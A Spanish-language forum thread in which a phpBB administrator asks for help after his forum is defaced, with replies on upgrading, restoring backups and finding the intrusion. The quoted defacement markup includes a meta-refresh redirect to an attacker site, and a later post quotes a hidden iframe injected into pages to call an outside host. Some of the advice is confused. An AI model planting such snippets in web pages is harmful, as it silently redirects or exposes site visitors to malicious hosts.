Foro phpBB crackeado

Hola:

Quería comentarles que administro el foro de una revista digital. No soy programador y no tengo ni conocimientos ni experiencia en el tema. La verdad es que debí suponer los riesgos que entrañaba desconocer la posible inseguridad del lugar. Verán, hace poco alguien lo crackeó, de manera que cuando se accede a él, a parte de aparecer la firma del cracker arriba, como título ("La curiosidad mató al gato, pero formó al hacker" por g0han), la página se redirecciona hacia un espacio web que ya dejó de existir, pero en principio era un txt donde se leía "g0han was here...".

Bien, el tema es que como podréis suponer, no he sido capaz de saber dónde radica el error y cómo solucionar el problema. Ocurre que cuando se accede vía web al foro ocurre todo lo que expliqué antes, pero cuando, por vía ftp, descargo el index.php, todo "parece" intacto. Soy muy torpe y lo único que se me ocurrió fue utilizar el buscador del dreamweaver archivo por archivo, buscando las entradas que sí aparecen cuando se lee el código fuente de la pagína. Si alguien quiere echarme una mano o quiere curiosear, que sepa que es ésta: http://www.revistateina.com/teina/phpBB2/

En fin, si alguien puede darme algna indicación, se lo agradeceremos. No pido ayuda gratuita para quitarme el marrón de encima; con alguna indicación bastaría. Desde luego si hay que realizar modificaciones muy complicadas lo dejaré estar hasta que pueda hacerme con los manuales y las ayudas que prestáis aquí en este foro. Pienso que en algún lado se darán estas órdenes que tan claras aparecen cuando se lee el código desde la web:

<title>"La curiosidad mató al gato, Pero formó al hacker..." by G0HAN :: Indice</title>
<!-- link rel="stylesheet" href="templates/subSilver/subSilver.css" type="text/css" -->
<style type="text/css">

o
<td align="center" width="100%" valign="middle"><span class="maintitle">"La curiosidad mató al gato, Pero formó al hacker..." by G0HAN</span><br /><span class="gen"><META HTTP-EQUIV="refresh" CONTENT="1; url=http://g0han.webcindario.com/hacked.txt"><br />&nbsp; </span>

... pero que luego, al ver el mismo index.php vía ftp, no aparecen por ningún lado.

En fin, un saludo y lamento que sea así mi primera intervención en el foro.

Mira, siempre hacen inyecciones SQL, te recomendaria que te bajes la ultima version del phpbb y restaures tu base de datos.

Pero si no quieres actualizar tu version solo restaura tu base de datos ;)

ThunderFx, estás en un tremendo error.

Las vulnerabilidades se producen en el motor del foro, esto es, en los scripts (el programa), no en la base de datos.
Antes de hablar sobre este tipo de cosas sería de desear que te informaras... con tu recomendación, jansen no habría conseguido más que seguir en peligro.

jansen, olvídate de lo dicho por ThunderFx y updatea a la última versión... y cambia los passwords.

Mira creo tu no entendiste lo que quize decir ..
Claro que las vulnerabilidades se hacen por medio del foro (script) pero tambien por ahi se pueden hacer inyecciones SQL.

Ahora a la segunda opcion de que si no quiere actualizar su foro pues aya el por ke ya sabe el peligro que corre de nuevo ;)

Pero.... qué tontería estás diciendo?. La base de DATOS es eso, DATOS, por ahí no se inyecta NADA, estamos?

Más estudio y menos ver películas de El Santo y creerse que todo es verdad, hombre.

("aya el" se escribe "allá él)

Hola

he visto este problema con varios clientes mios. Es debido a que estas usando una version del script con vulnerabilidades. Te recomiendo que hagas una instalacion limpia del foro osea elimina todos los archivos he instala la ultima version del foro. Si tienes un backup de la base de datos te recomiendo que remplazes la actual base de datos con esa. si no tienes un backup busca en las tablas de la base de datos por posibles links que el hacker alla dejado para redireccionar. Tambien cuando armes el foro busca por posibles administradores que se hallan creado. Para ello te recomiendo que instales este script http://www.phpbb.com/phpBB/viewtopic.php?t=232010 el mismo buscara por posibles usuarios sospechosos.

espero que te sirva la ayuda.

saludos

Muchas gracias a todos por sus respuestas. Tomo buena nota de las indicaciones que se sugieren (ThunderFx, Inside PHP, no se peleen, ¡les agradezco el interés!). Tengo un backup de los datos de este mes de enero, así que tan sólo perdería información de un par de meses...

En primer lugar revisaré la tabla de datos y los scripts, mejor dicho, buscaré los archivos/carpetas a los que se refieren (perdonen pero todavía tengo que irformarme, y eso que me daban chikilín).

Sea com sea dejaré aquí constancia para que sea de utilidad a cualquier principiante.

Un saludo

En ocaciones extremas, lo mejor es que la empresa, (si dispone de $$) compre un foro no free, asi no hay HACK que conozca el funcionamiento de las aplicaciones.

Es el riesgo que existe en aplicaciones OPEN Source.

En esos casos lo mejor es programar, lo que implica hacer cientos de pruebas y "auto Atacarse".

Pero al menos nadie sabra cual es el dir donde esta conexiones.php ni otras cosas...

PD: claro... Cuesta $$, pero si es una EMPRESA o MARCA seria, debiera hacer eso.
O como hace FDW comprar un FORO que "les responda" como [vBulletin]

Salu2!.

Buenas jansen, por lo que comentas habrán explotado el fallo que afectaba a las versiones anteriores a la 2.0.13, tienes mas información aqui:

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563

A través de ese fallo se consige permisos de administrador del foro, nada mas, por lo que en principio no deberías preocuparte por el estado del servidor.

Desde el panel de administración del foro ha cambiado la configuración, por ejemplo en el título a puesto la frase que nos has puesto. Esa información se guarda en la base de datos y no en los ficheros (código del foro). Por eso cuando abrias esos ficheros no encontrabas esas cadenas.

Te han propuesto algunas posibles soluciones, en mi caso, es que sigas con phpBB pero estate al día de las alertas de seguridad. Simplemente pasandote por la portada de phpBB.com estarás informado.

Esta es la URL del usuario por si quieres avisar a los administradores de Miarroba.com:

http://g0han.webcindario.com/hacked.txt

Saludos.

El tema de la "injeccion SQL" supone que se pueda ejecutar ciertos comandos SQL desde una entrada de datos que pidas en tu aplicación .. puede ser un simple "input" de un formulario o datos que aceptes por el URL .. Esa ejecución del comando SQL si se llega a producir por mal filtrado/nula validación de los datos .. y demás despistes de programación .. pueden dar el privilegio de cambiar una contraseña del administrador (en tal tabla .. cambiar tal campo/dato) por ejemplo y así tomar el control de esa aplicación.

Entre otras cosas .. te cierran el accesos a tu panel de administración de esa aplicación (pero no de la entrada a phpMyadmin o tu cPanel o lo que uses habitual para administrar tu BD).

Si usan google: SQL injection php mysql
podrán ver muchos artículos sobre el tema y como corregirlo para evitar dicho problema.

Un saludo,

PHp nuke esta echo con las patas , he revisado el codigo y no es muy de mia agrado, ademas que cada rato salen actualizaciones pero esas te las cobran $$$,

te recomiendo Geeklog

y para aquel que no sabia que existian las inyecciones via SQL , mejor deja de ver tu las peliculas del santo y ponte a investigar para no dejar muestras de tu ignorancia y arrogancia

A ver si nos calmamos un poquito y tiramos más de Trankimazín... o más. Las técnicas de inyección vía SQL son conocidas y están descritas desde el pleistoceno, pero aquí de lo que se trataba es de que al pobre hombre le recomendaban no cambiar el fuente de su foro, que es precisamente lo que ha permitido, con sus vulnerabilidades, la intrusión. Tamos?... y esa recomendación es un auténtico disparate.

Tampoco parece serio decir que se ha "revisado el código (no, son los fuentes) y no es del agrado"... Mira hijo, este es un foro técnico y "sensaciones" no valen gran cosa cuando se trata de cosas técnicas: hay que explicarlo, describirlo y decir el porqué. Si no se hace así, esa afirmación no es más que una "salsa rosa" de farol.

En fin, pobre chaval si para evitar el crackeo no cambió los fuentes.

Es muy recomendable actualizarse a la última versión de phpBB, que además en este caso es una actualización crítica. Por otra parte he de decir, que al menos en phpBB, esas vulnerabilidades no siempre se han debido a los scripts PHP del foro, a veces se han producido por bugs en el propio interprete de PHP. Y las correcciones se han hecho teniendo en cuenta esos bugs. Pero muchas otras veces, si que se ha tratado de errores de seguridad que permitían entre otras cosas inyecciones SQL, loguearse como admin (en las primeras versiones de la 2.0.x), etc.

Por lo que creí leer en el caso del Santy me pareció a pesar de que no tengo ni papa de inglés un error más que nada de PHP...

http://forosdelweb.com/showthread.php?t=256416

Con lo cual supongo que también hay que tener cuidado con qué versión de PHP tenemos instalada en nuestro servidor. Eso era lo que quería decir.

El problema al que a veces los administradores de este sistema de foros se enfrenta es que a la hora de actualizar sus scripts, si por casualidad tenían en su versión anterior instalada alguna modificación, de importancia para el funcionamiento de los foros, como pudiese ser la modificación que permite subir archivos (que aunque parezca mentira es una pena y no viene de serie ), pués tendrían que volver a instalarlas. Y es que es un problemón, porque no es una modificación fácil de instalar, hay personas que se mueven muy bien con PHP y no han conseguido instalarlas, y es sólo un ejemplo.

Y todo esto unido al hecho de que se trata del sistema de foros más utilizado, lo cual le agrega predisposición a ser hackeado, y al hecho de lo fácil que resulta encontrar foros vulnerables a través del google, en fin que hay que tener mucho cuidado ,

Salu2 ;)

Señores tengo un problema;

El foro de mi guild ha sido INJECTADO.

La version es: phpBB 3.0.2

He encontrado este include en muchisimas paginas del server.

<iframe src='http://onlinestat.cn/stat/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Menos mal que tenia un backup de 1 semana activado y otro de archivos web.

Agradeceria ayuda de como parchear esta version!

Gracias.

Que tal danistone, te fijaste en la fecha de publicación del post? por favor deja que descanse en paz, ah se me olvidaba bienvenido al foro, ahora si deseas publicar alguna inquietud es mejor que habras un nuevo tema y en el lugar indicado este es el foro de PHP, lo que necesitas en el Foro de phpBB de pueden ayudar.



Saludos.

Danistone:
Mi recomendacion es que debes buscar y encontrar por donde entro este hacker, ya que a mi me paso lo mismo y detecte como ocurrio y como logro hacer todo eso.
1.- Busca uno de los archivos modificados y determina cuando fue modificado por ultima vez.
2.- Busca los logs (Acceso y Error), especialmente del apache y trata de ubicar que IPs entraron a tu sitio en o alrededor de esa misma fecha, hora y minuto.
3.- Observa si hubo algun POST desde Internet.
Nota : Esto te dara como y donde ingresaron.
4.- Busca la IP que corresponde al sitio "onlinestat.cn" y utiliza algun conrtafuego
para bloquearlo totalmente, ya que cada vez que ingresan a tu sitio manda señales hacia ese sitio.
5.- Eso se llama Cross Site Scripting y te recomiendo que visites desarrollo web que tienen un buen tutorial de como remediar este asunto.
6.- Asimismo, por estas razones es que debemos poner en Internet unicamente aplicaciones profesionales; y aun asi muchas veces fallan.
7.- Finalmente, te debo decir que si ese hacker hubiera deseado destruirte tu sitio lo hubiera podido hacer, asi es que debes solventar eso validando todas y cada una de las formas que tus usuarios tienen posibilidades de enviar datos a tu aplicacion.
8.- Termino diciendo que la cantidad de sitios web "defaced" o que le hacen lo que a ti te ha pasado andan por el orden de miles por dia.
Saludos
Y espero te ayude
Franco
9.- Algunas veces he visto en este foro, usuarios que quieren instalar servidores de correo sencillos y no profesionales y esa actitud es una invitacion a que te lo secuestren y debido a todas estas inprudencias es que el mundo del correo electronico se pone cada dia mas y mas dificil.
10.- Esto lo he decidido poner aun cuando este post es del 2005. A alguien le servira!.

Tema demasiado viejo. Por favor danistone crea un nuevo tema en el foro indicado si lo requieres.